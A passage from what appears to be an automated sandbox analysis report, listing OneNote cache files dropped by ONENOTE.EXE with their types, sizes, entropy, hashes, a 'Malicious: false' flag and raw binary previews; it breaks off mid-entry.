Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.626606803245197
Encrypted:	false
SSDEEP:	192:rs/0Rah+dhjvijBWv1sFGmP0X+Z/y2cXH2O3ORpF2CgQc9S90mTFAsIfO39s+s:Q8sej8BWv1C3P0OZy2+H2JRpFXgQgS9f
MD5:	D873FE94CE937AC0BE699D2A106EA0E0
SHA1:	1AE5085301256EB6DB8E1827B159A57523A704B7
SHA-256:	F5A32DE84E26F0E4E4F1DA455254EABE5E6E0AED568050ACC8986BE02B27C2B2
SHA-512:	2349D1B2FAA09EF20ADC7856011A264CBA7CF3E27585D4E4F74821E59E3FFE46A934059C15A7E8BC5730CD4E83F96B4567E9E528D522A0869F9F86891281AEAB
Malicious:	false
Preview:	2...>...&...j...v...>.... ...,..2...>...........v.......@....+..............................................................................................................................................N.......).....\6...).I.......I.qk..B.....LZ....).....\6...).....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............t..R.0..:..........N...^...................-..A...s.a.............t....................................I.qk..B.....LZ............t..R.0..:......................................................................................................j.......T(................@.......c.......p.....$.\.$...$.................;........4...4...4................3.........z...y.. x.. ...........$...........7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.6..............z.......R......................7............S.y.m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.9148455201741044
Encrypted:	false
SSDEEP:	192:gsgv9H69gJQCHwWjrBYMljEvYfQOtrkd68i8K3RrYY0TrnhSHX1GReaF/MPFmMZt:FwH6mJHHwWnBll4AYikd6X8KhYXTrhUt
MD5:	F2A53C54089A8796CBFFBC77F2BFAF52
SHA1:	2066540670A6ED12506BE11817A273EA471A1809
SHA-256:	44CBC78AD5D52BD295AD939D5E8F03C4184CFEAE5FC321544BB9F87BB6E422A5
SHA-512:	2D9E792FE524FCA5432F2D3E906A52A62AE0B0B3C4088331E361469191DFCCF309F7DA8E4C2691FBA6161FF4C90AD8E8FCC8E2591790E5EF5246A2FF3762241A
Malicious:	false
Preview:	....>......."...v....... ..."......>.......r...v...>...@....!...........................................................................................................................................I.......I.qk..B.....LZ.Hk......Hk.:\..#.i...R..Hk.:\..#.i...Rd.Hk.4........1.I..s4....I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'.....................4<c.........N...^...............:l~.Qv.O.P\|N.J.`............r...............................z....I.qk..B.....LZ....................4<c.......................................Hk......Hk......Hk.........................................Hk......Hk.:\..#.i...Rd4...8...4........1.I..s2................................I................................Hkj.....HkT&\|...Hk......Hk..8..4.......4....Y..4.......4..$.7......4..!4....z...,4. ............................"......$...7...............T.u.e.s.d.a.y.,. .J.u.l.y. .2.8.,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.848637923318488
Encrypted:	false
SSDEEP:	192:K6sf2CzVTAD99jUDQHssjWERHA1UhjCNjdjpXNHQKRlxD:W+C6Rl82cOCVFpJQKRl
MD5:	628F63257E3760CC55FBF287887C07F8
SHA1:	0BC2FC4090F2253CE4E618A1BC6A03E12047ADE6
SHA-256:	8297E7BD5A9CCBAAD66D78EB4894E6615F1238DF968B4DDB01CBDD76F68F6BCC
SHA-512:	C66027777743866AD299DE4EF7E848B0DCD1FED66E60823FFDF8646F256A608F9D5E727421A7410908CD96D4B4A0E8FB7D263AC56250D74938AE8AB40B8E6761
Malicious:	false
Preview:	2...>...........v.......H ...!..2...>...R...,...v.......@.... ...........................................................................................................................................I.......I.qk..B.....LZ..>.<.....>F...;..^Kz,...>F...;..^Kz,...>..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............hW.......B..z......N...^....................&.M....g...............P...............................4....I.qk..B.....LZ.............hW.......B..z.....................................>.......>.......>...........................................>j......>T.q....>.......>..]....>H......> .@....>$......>..d...............;........4...4...4..............z.......R......................7............S.y.m.b.o.l.......................'..>%..>..z...,4. .......$>........4..p..7........................................;........4...4...4

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	5.305332220924444
Encrypted:	false
SSDEEP:	384:TEJ2DxA75iwCYq0MkK1nWntNLykNHDLBS5UahPXgulkqw/CxZK6mDrDrWKO:TEhekNK7RE
MD5:	8ADAE1838742B0A40A52965202F0FF03
SHA1:	43EE6FF047A4BC995BA04818D49ED2C5309413DC
SHA-256:	EC57CE90E1F14BD7BAFD35C4BEA03514A90C4A22CCE26B703194D2E84E182DCB
SHA-512:	073E647DF70C2508EA2F3E1F305B9E0D303E6D2C1ABB972C7F540B2C2CA88DEFB8B018129F57C712ED406B499ABFDB1A53B26595A1FC9A76E212896F47E40C20
Malicious:	false
Preview:	@.......(...........@....@... .. L......@...................\...`J... ...J..............................................................................@........................J... ..@K............................@...m.iKH.............R..,........C.g..Y...0...c!.C..j..k.4...t..Ka..j.....FS..X.5Y~#..gr..F...........C.......C..................................................e..T....`..T./....!T....n"T.m...!%T%.....6T!....ENT%5....aT!5...........0...........e....4.........................Ap.H..@.AFJy.k.....(.....x.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .O.r.a.n.g.e...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...2...0.0.0.2.4...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e....wT......wT.J{..'_.L.:N.s.....*.s.C.CH.}8DZ. .2...^...............D...`... .......e...06....!..!%.(.A.S@B...............0...........e....4.........................A..:4E.2..p1......(...`.i.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .Y.e.l.l.o.w...j...P.a.g.e.L.o.c.I.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.0316665723224245
Encrypted:	false
SSDEEP:	96:0s3gyfGkoEaueXa9zUETtRLOrrprorar8rpqrrir:0swy7VaueXa9z5RLO
MD5:	C4E701C1E77CE39BC5CAA4FE563C3253
SHA1:	7E3B2991AB241C6E7EF4DFF81134EBA45DE71E4D
SHA-256:	F314CCCDFEB8B9943D1D778A57217EE0236DB989FB8C0D4044C2CFD4B450D557
SHA-512:	29ACE8EB03EAF4DA74CD6DC2B0DF07DBD581673B61FE20ECD6B23826E1012941F224D3AC4139E629B1FB1B01AE0DF8D3A53956FFE6FAE5E26CD01E92A382E468
Malicious:	false
Preview:	2...>....... ...v....................................................?....?.............................................................................2...>.......\|...v...H............................I.......I.qk..B.....LZ.1t......1t..R.......S..1t..R.......S..1t..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................\;.J>......N...^...............A......@..&...`.........f........................................I.qk..B.....LZ....................\;.J>..................\;.J>............1t......1t......1t..........................................1tj.....1tT.]...1t......1t..B...1tH.....1t..B...1t..>.).1t..J...................;........4...4...4.."...............1t..1t..1t..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........1t......1t....#.1t............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.08730859862972
Encrypted:	false
SSDEEP:	96:1sVFT/WE69MEsX49KYKTTRygmLVDIBHSD9y06:1sVZ1YpsX49K3nRyTLVDSHSDU06
MD5:	2FE106D18BB1296AD745A7463424DB79
SHA1:	F92BD1C851A86557104FD009F08DE9A928107A7F
SHA-256:	15D02DC21FF9601FB31D9CAE73D933F245704B7258B9C1C4D21AC48FE3257E97
SHA-512:	0E2D38D684F4242C944C25686C1A2CC536C0D74C2C7393E74D31D21057264B715FE33756A68CF56CA0AF92A58F3C533AF79914153E840936A8C5B53CCE082122
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ.$.......$.....:/g.....$.....:/g.....$...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............-!..)^..(..~Y2....N...^................n..B..A....U.%s........f........................................I.qk..B.....LZ.............-!..)^..(..~Y2.........-!..)^..(..~Y2..........$.......$.......$...........................................$.j.....$.T.]...$.......$...B...$.H.....$...B...$...>.).$...J...................;........4...4...4.."...............$...$...$...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........$.......$.....#.$.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.0261495635989935
Encrypted:	false
SSDEEP:	48:RslioqSUZ6trqJgE3p2X89haOOToOrd6rOeIXdXpDXSHKtLtZVyg:RsmZ6tdE3oX89AOOTHRiOHRVy
MD5:	827B6178B551E63015FD80B028AD2558
SHA1:	0A019B6649755F802C39F5B8862439FC4D03134C
SHA-256:	CC439DF377CF9863DDA06AE4D9B64602AE634115E23FFED81746BCD087DD206A
SHA-512:	B02634D8C659D68F8A4CEE6FD3F864D3763066BE2C06D58C0A9E3DB0A5225D9DF9B9F95B04D72511C7E6889A3FA453A2541560C411EC98800FD00941D829348E
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ.o.......o...,.>..@.I..o...,.>..@.I..o...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............a2 h.....1I".T.....N...^................[.....O....4..t........f........................................I.qk..B.....LZ.............a2 h.....1I".T..........a2 h.....1I".T...........o.......o.......o...........................................o.j.....o.T.]...o.......o..B...o.H.....o...B...o...>.).o...J...................;........4...4...4.."...............o...o...o...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........o.......o.....#.o.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.049510191538986
Encrypted:	false
SSDEEP:	96:9sQ7sQ+vq/EDX4v9E5TJRrTBcq/z/qq/PQ/5q/z/r2/W/o:9sKsv9DX4v9E5dRrTCqrSqnQxqr6+
MD5:	A797C4245BE07A92CB47DCC852C143D9
SHA1:	EF06B0D1ED94C7847EF2E8861308F1C91879CDA1
SHA-256:	EAC7624930125195D9A488BBBF86E5F74942BA560ED15980FAEDCE3488543CFC
SHA-512:	85923BE3764D876350812B7DC94F2CD5CCA6363FF61D09E86C70878367D5CAC04EC07B38A37D108B97DE7C8642AD9FEFE713E08FE1083516FB7E43FE81ECCEE5
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ7n8.....7n8....%.W_...7n8....%.W_...7n8..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............\8..Q....T.R..^....N...^...............A.eO...D.%nz...&........f........................................I.qk..B.....LZ............\8..Q....T.R..^........\8..Q....T.R..^.........7n8.....7n8.....7n8.........................................7n8j....7n8T.]..7n8.....7n8..B..7n8H....7n8..B..7n8..>.)7n8..J...................;........4...4...4.."..............7n8.7n8.7n8..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........7n8.....7n8....#7n8............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.045149119883495
Encrypted:	false
SSDEEP:	48:9sQ1aOJGYJyzTayt48KMEHhsXCKW9F+t6Toe6rdqr9IQdX8LyGVYYZv/sg:9stTayTjEHqXJW9F+ETaRytys
MD5:	B3727F4315A544D2089417CD3AB4E3E0
SHA1:	9ED1E7072CCC19026868E3D265431B8490522FC1
SHA-256:	022D0CEB5B0582EA8DB987CCE6EC48093742FCE5C3835A8DB71653FA64AC484A
SHA-512:	FB1FA5F60C67418B7E9F910499184D23F8653200B3CB2C75DB01D6CA74AB1B4020512EBCF21DFBC661879D5F6B320106CFA62C4DD55EE780FC94DD6802CB5106
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ.t.......t.=P...6G.`..wW.t.=P...6G.`..wW.t...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............v.....k.?d..p.7]....N...^..................P{m.C..tH............f........................................I.qk..B.....LZ............v.....k.?d..p.7]........v.....k.?d..p.7]..........t.......t.......t...........................................t.j.....t.T.]...t.......t...B...t.H.....t...B...t...>.).t...J...................;........4...4...4.."...............t...t...t...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........t.......t.....#.t.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.093913433331725
Encrypted:	false
SSDEEP:	96:iBsVlvh7IFrEqXw9lfuT0RPFUp73qC7UDA:iBsVlFIWqXw9FuYRPCp73qC78A
MD5:	6372D1368F69BFA9A7AADB9DAE693732
SHA1:	50DD6EB522A401FEC1147EA3253241EFC474CE1F
SHA-256:	972CB62CA870CD8AF7F612A1F89F6BAE3FD979FBC02C304A80F6262CEAD578A4
SHA-512:	F47B450E934289D61FEAB9828D35A9A94C47D4BA1C207F047E6F638978D513C1831473D348A68A283892DA104B40C1D4A67F40E3968D29EC142B5FFBB0CC2998
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ..........M/...a....t....M/...a....t.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............G..........rx..;....N...^...............Sw..\|.F...Bt.m........f........................................I.qk..B.....LZ............G..........rx..;........G..........rx..;....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4......7...7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.091745188277576
Encrypted:	false
SSDEEP:	48:YxsJ9mGcvtdwKEYwfWXlW9BXTos7rdmrLIzdXhBdRR2S7drN:KsmGcvPLEYmWXlW9BXTH7R2gZwYR
MD5:	9BBAF3FB97003E6DFF34839E3D2912EE
SHA1:	DB2DE5D7AF22A89C41E54AA03EDDAE8A8A62F056
SHA-256:	FD495CB8468BC0F7FFDE78074DE3BD77C9D241744FCCC56F4ED061B692A548FD
SHA-512:	19FC14DE799B3311555B7329805FDB8AB2554EB8FFCCFE0361233BD604F3B623B76520683AE9C3E003A1F926CEEB106A545A8A0639EB4E6FCF1C75C043D4D443
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZa.X.....a.X.s[..; ...+..a.X.s[..; ...+..a.X..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............................N...^...............*....YRG.0..(U7........f........................................I.qk..B.....LZ.........................................................a.X.....a.X.....a.X.........................................a.Xj....a.XT.]..a.X.....a.X..B..a.XH....a.X..B..a.X..>.)a.X..J...................;........4...4...4.."..............a.X.a.X.a.X..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........a.X.....a.X....#a.X............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.081161795903706
Encrypted:	false
SSDEEP:	48:YJslhhmdEVlt0JGEn6rFXU9MoAsH6To1rdvlxrroITSdX6lR55jV:ysAdEVlC0EIXU9MoJaTcRHxSK
MD5:	DD25B28803FC7086E8A46F6A73ECCE76
SHA1:	E532EE5A4C1345157778F70A97F58D431ECC1A23
SHA-256:	DD2D684EFA0B55B3C49DFB1605D9FD6388ADCDFD16BE7E3C3EEBDE8F667D6148
SHA-512:	F4E62DB91DB726381604ACF1F1D5CFA9E38CA0788E5DD26E110747ADAFF7A23DF72A08D2E0EFAC34CB71F5159AEF01270347A8E9C7C21DFB75134ADA409C4427
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZU\Q.....U\Q.;...90.#JX..U\Q.;...90.#JX..U\Q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................cop.5...........N...^...............f.....QM..*v.,HT........f........................................I.qk..B.....LZ................cop.5...................cop.5................U\Q.....U\Q.....U\Q.........................................U\Qj....U\QT.]..U\Q.....U\Q..B..U\QH....U\Q..B..U\Q..>.)U\Q..J...................;........4...4...4.."..............U\Q.U\Q.U\Q..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........U\Q.....U\Q....#U\Q............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.078958984226685
Encrypted:	false
SSDEEP:	96:2s1GM7ggIxtEXgyXs9ACWTQRjDeMD4hfn7:2skgKKXgyXs9ACWcRjD
MD5:	51F6CB934DEA4AC5D92DF30AE3272785
SHA1:	5CB06466CDE453063890255E6FA0B1A4F0771104
SHA-256:	5186BDC8679C29474E06FB39D082DEF39F01F324739056195E67E17FF9B6A9B2
SHA-512:	3352068BC6D1598F6552F1E1965D06D437706D26E438DC38BE9C7C303FEEFA9B0F8E20841D0C76E9D03AC338ED09C0A187BB862855EDC65E010291E29DE0B83D
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ..U.......U.t.....).q.....U.t.....).q.....U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............$"..i./.$..%2.d.....N...^...............f.`$oY.F..i.Xy..........f........................................I.qk..B.....LZ............$"..i./.$..%2.d.........$"..i./.$..%2.d............U.......U.......U...........................................Uj......UT.]....U.......U..B....UH......U..B....U..>.)..U..J...................;........4...4...4.."................U...U...U..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........U.......U....#..U............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.085666554045384
Encrypted:	false
SSDEEP:	48:YY7UsMXZZkbeMtbeaE8SXw98g7N+TozrdQr+IFXKdX9CpdBRD0Led7o4l:Gs2ZkbeMbErXw988N+T+RIVXK4
MD5:	EC4B607245BDF1E5D0A688504BB90C1C
SHA1:	F16E17D6126A6432354037D0DC0539966BFDC28E
SHA-256:	515BD6F13DEAA31EDD4697814CD171C4E00A0C512B9F1390BF26F58C4C90F41E
SHA-512:	05C4E1109083029C6CCF096C89013811A72C80CF0A1B5F4564F6F2086933A94D2F53FF20A14F25598704321B88224BC8CC1D8BA1AB87CBC7A61E1D0CEB549509
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZY=D.....Y=D..'.#.DC.u3.Y=D..'.#.DC.u3.Y=D..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............^..n.?dX..?......N...^....................p.I.m..kN..........f........................................I.qk..B.....LZ.............^..n.?dX..?...........^..n.?dX..?...........Y=D.....Y=D.....Y=D.........................................Y=Dj....Y=DT.]..Y=D.....Y=D..B..Y=DH....Y=D..B..Y=D..>.)Y=D..J...................;........4...4...4.."..............Y=D.Y=D.Y=D..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Y=D.....Y=D....#Y=D............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.079537453484379
Encrypted:	false
SSDEEP:	48:Y0Z2sjjYyiSF+t+52ELh9pXk9NUToTrdP7rYIM1dXkRHRD59V:2sgbSF+DEfpXk9NUTSRfy1M5/
MD5:	560EEC65398C70476763ABC7A7F01F3C
SHA1:	8948689BF420EFDF085C83C0B0F4C6BE85C8E887
SHA-256:	7292ED21A81C007A4A3C75426321A6C729A2C5F3EFDD50A6CB785936F54F2E9D
SHA-512:	B9D7941176DF775D1540E9A877396168B78600B805D13CBD6BC714AE912B8E94B8AB5100F5E2CBA186314FB4B7FB5A05C75ABBE5F2988F5EAAC55E14B0BE2F5A
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ...........54...6..O.@z...54...6..O.@z.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............?5...-..f.#.#....N...^................?6...B.F..c...........f........................................I.qk..B.....LZ..............?5...-..f.#.#........*..?5...-..f.#.#........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.075388463737207
Encrypted:	false
SSDEEP:	48:YDNsLcHgLkbltfWGEFnIX7k9Ia2ToP9rd2trw1IydXyBRmY9:6NsgSkblBZEFIXw9Ia2Te9Rew7y
MD5:	EBD47F6C6F5EE8B0D32DEC684BFE646E
SHA1:	4175E35BAB3687AFE749DFB532CCF4D733D44CA5
SHA-256:	074E56C32C9E4CD3BD4D897DC22302736521EAE2F22A50536F41CC85573820D6
SHA-512:	6AA84F550960BBC64C5492B383DDE36B086A6C0C41B3CDC3504E941DED8D72BBFEA9F62F6F2B5B49A8CB21C528EDD5C68D04595D51786E2697AAF965686837AE
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZt.3.....t.3..f..O=.....t.3..f..O=.....t.3..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............n...0.<8.NN..R....N...^...............Nr.K.>.E......9.........f........................................I.qk..B.....LZ............n...0.<8.NN..R........n...0.<8.NN..R.........t.3.....t.3.....t.3.........................................t.3j....t.3T.]..t.3.....t.3..B..t.3H....t.3..B..t.3..>.)t.3..J...................;........4...4...4.."..............t.3.t.3.t.3..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........t.3.....t.3....#t.3............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.069020641905962
Encrypted:	false
SSDEEP:	96:TW2sQ/JfbtUWw6QQE3XPg9SxW7TqRfHdXscBvJpGY+lzcss9BP:dsQ/JfbtUYQt3XY96W7uRv5scdJpGY+s
